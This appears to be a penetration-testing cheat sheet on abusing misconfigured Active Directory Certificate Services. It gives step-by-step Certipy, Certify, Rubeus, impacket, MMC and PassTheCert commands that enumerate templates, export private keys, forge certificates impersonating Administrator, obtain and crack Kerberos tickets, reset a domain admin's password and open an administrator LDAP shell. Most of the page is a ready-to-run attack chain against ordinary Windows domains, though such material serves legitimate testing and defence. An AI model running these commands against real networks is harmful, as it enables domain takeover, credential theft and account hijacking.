AD CS (Active Directory Certificate Services) Pentesting

Last modified: 2023-08-26

Active Directory Privilege Escalation Windows

AD CS is Public Key Infrastructure (PKI) implementation. The misconfiguration of certificate templates can be vulnerable to privilege escalation.

Enumeration

We can retrieve certificates information on target Windows machine using certutil.

# Dump general information
certutil -dump

# Dump information about certificate authority
certutil -ca
certutil -catemplates

# List all templates
certutil -template
# specify the template
certutil -template ExampleTemplate

Then check if Allow Full Control or Allow Write include the group which current user belongs to. If so, we can modify the template and might be able to escalate privilege.

Existing Certificates

Get-ChildItem cert:\
Get-ChildItem cert:\CurrentUser\
Get-ChildItem cert:\CurrentUser\My
Get-ChildItem cert:\LocalMachine\
Get-ChildItem cert:\LocalMachine\My

Extract Certificates

$cert = Get-ChildItem -Path cert:\CurrentUser\My\<thumbprint>
Export-Certificate -Cert $cert -FilePath c:\Users\<username>\Desktop\user.cer

Extract the Private Key from a Certificate

$pw = ConvertTo-SecureString "password123" -AsPlainText -Force
$certificate = Get-ChildItem -Path cert:\CurrentUser\My\<thumbprint>
Export-PfxCertificate -Cert $certificate -FilePath user.pfx -Password $pw



Privilege Escalation with Vulnerable Template

From Outside the Machine

We can use Certipy for finding vulnerable templates, requesting TGT, and authentication.

certipy find -vulnerable -stdout -u username@domain.local -p password -dc-ip <target-ip>
certipy req -u username@domain.local -p password -target <target-ip> -template <vuln-template-name> -ca EXAMPLE-CA -upn Administrator@domain.local
certipy auth -pfx administrator.pfx -dc-ip <target-ip>
# If you get the error like "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)", sync the time with AD server.
sudo rdate -n <target-ip>

Now we get the NT hash so we can login the target machine using this hash by Pass-The-Hash.

From Inside the Machine

We can use Certify.exe for enumerating the templates and requesting certificate.
It can be downloaded from here.

# 1. Find
Certify.exe find /vulnerable

Certify.exe request /ca:dc.examle.com\example-CA /template:TemplateName /altname:Administrator
# Copy the cert.pem in the output then paste it to the cert.pem
vim cert.pem

# Convert PEM to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# Request the TGT
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
# if you gave the password for "cert.pfx", you need to specify the password
Rubeus.exe asktgt /user:Administrator /password:password123 /certificate:cert.pfx /ptt
# or output the file
Rubeus.exe asktgt /user:Administrator /certificate:<Thumbprint> /outfile:ticket.kirbi

Now we get the TGT (.kirbi) file.
We can use it to the following parts:

  • Crack TGT

kirbi2john admin_tgt.kirbi > hash.txt
# or
python2 /usr/share/john/kirbi2john.py ticket.kirbi > hash.txt

john --wordlist=wordlist.txt hash.txt
  • Pass-The-Ticket
impacket-ticketConverter ticket.kirbi ticke.ccache



Privilege Escalation with Microsoft Management Console (MMC)

If we find the template which contains vulnerable parameters, we can create a new certificate using the template and can gain access to the Administrator's account.
There are some method to create the new one. However, this section provides the easiest way using MMC.

1. Request a New “Malicious” Certificate with MMC

  1. Right-click on the Windows icon, and select Run.

  2. Enter “mmc” (Microsoft Management Console)* in the form and click OK. The console window opens.

  3. In the MMC window, click File → Add/Remote Snap-in..

  4. Add the “Certificates” snap-in in the window then click OK.

  5. Expand the Certificates in the left pane.

  6. Right-click on the Personal and select All Tasks → Request New Certificate.

  7. The Certificate Enrollment window, click Next twice.

  8. In Request Certificates section, click the “More information is required to enroll…”.

  9. In Certificate Properties window, choose types and enter values in the form.

    Subject name:

    • Type: Common name
    • Value: vulncert (specify an arbitrary name)

    Alternative name:

    • Type: User principal name
    • Value: tester@abc.example.com (specify the impersonated name and the target domain)
  10. Add each name and click OK.

  11. Return to the Request Certificates section. Check on the certificate we want to request, then click Enroll.

  12. After finishing, expand Personal → Certificates. We should see the new certificate is added.

  13. Double-click on the certificate. The Certificate window opens.

  14. In the Certificate window, select Details tab and choose Subject Alternative Name. We should see the principal name is our specified name e.g. tester@abc.example.com. If we can, click OK to close the window.

  15. At the end, in the MMC window, right-click on the new certificate which we created and select All Tasks → Export… to export the certificate. The Certificate Export Wizard opens.

  16. In Export Private Key section, select “Yes, export the private key” and click Next.

  17. In Export File Format, it is usually okey the default .PFX format so click Next without any changes.

  18. In Security section, check the Password and enter new password.

  19. In File to Export section, enter the file name and Next.

  20. Finally click Finish then we could export the new malicious certificate.


2. Impersonate User using the Malicious Certificate

If we create a new certificate, we can use it to impersonate the privileged user.

  1. Request Kerberos TGT (Ticket Granting Ticket).

    Rubeus.exe is useful to do for that. For details, see Privilege Escalation with Kerberos.

    Rubeus.exe asktgt /user:tester /enctype:aes256 /certificate:vulncert.pfx /password:password /outfile:tester.kirbi /domain:labc.example.com /dc:<ip_of_the_domain_controller>
    

    After that, we should get the TGT (.kirbi file).
    We can gain access using the TGT by changing the password of the DA account.

  2. Change the Password of the DA (Domain Administrator) Account.

    # changepw: Change the password of the target user
    # /ticket: Specify the TGT file (.kirbi) we've generated
    # /new: New password for impersonated user
    # /targetuser: Specify the Domain Administrator account name
    Rubeus.exe changepw /ticket:tester.kirbi /new:newpass /dc:<ip_of_the_domain_controller> /targetuser:abc.example.com\<da_user_name>
    
  3. Get the Administrator’s Shell

    Using runas command, we can gain access to the Administrator’s account.
    Use the new password which we’ve given the previous section in prompt.

    runas /user:abc.example.com\<da_user_name> cmd.exe
    



Add Computer and PrivEsc

1. Add Computer to the Domain

We can use the addcomputer (impacket) which is usually used for AD CS (Active Directory Certificate Services) Privilege Escalation.

impacket-addcomputer 'example.local/username:password' -method LDAPS -computer-name 'TEST$' -computer-pass 'password'
# or
impacket-addcomputer 'example.local/username:password' -dc-ip 10.0.0.1 -method LDAPS -computer-name 'TEST$' -computer-pass 'password'
# or
impacket-addcomputer 'example.local/username:password@example.com' -method LDAPS -computer-name 'TEST$' -computer-pass 'password'

3. Request Certificates

After adding new computer, we might be able to retrieve certificate using this computer account.
At this time, try using alternate UPN (-upn) for administrator because we want to escalate privilege.

certipy req -u 'TEST$' -p 'password' -ca VULN-CA -target example.local -dc-ip 10.0.0.1 -dns ca.example.local -template Example -upn Administrator@example.local

If successful, the file which contains certificates and private key (e.g. administrator.pfx) will be saved in current directory.

4. Authenticate using PFX

We might be able to retrieve TGT using the .pfx file as below.

# From outside of target machine
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
# From inside of target machine
Rubeus.exe asktgt /user:Administrator /certificate:administrator.pfx /ptt

Then using/cracking it to authenticate as Administrator.

Option: Authenticate over LDAP

Reference: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html

According to the article above, we may be able to authenticate over some protocols such as LDAP(S). First off, split the administrator.pfx with certificate and private key using two commands below.

# Extract certificate by `-nokey` flag
certipy cert -pfx administrator.pfx -nokey -out cert.crt

# Extract private key by `-nocert` flag
certipy cert -pfx administrator.pfx -nocert -out cert.key

After that, using PassTheCert, we can spawn shell as Administrator via Schannel against LDAP(S).

python3 passthecert.py -dc-ip 10.0.0.1 -crt cert.crt -key cert.key -domain example.local -port 636 -action ldap-shell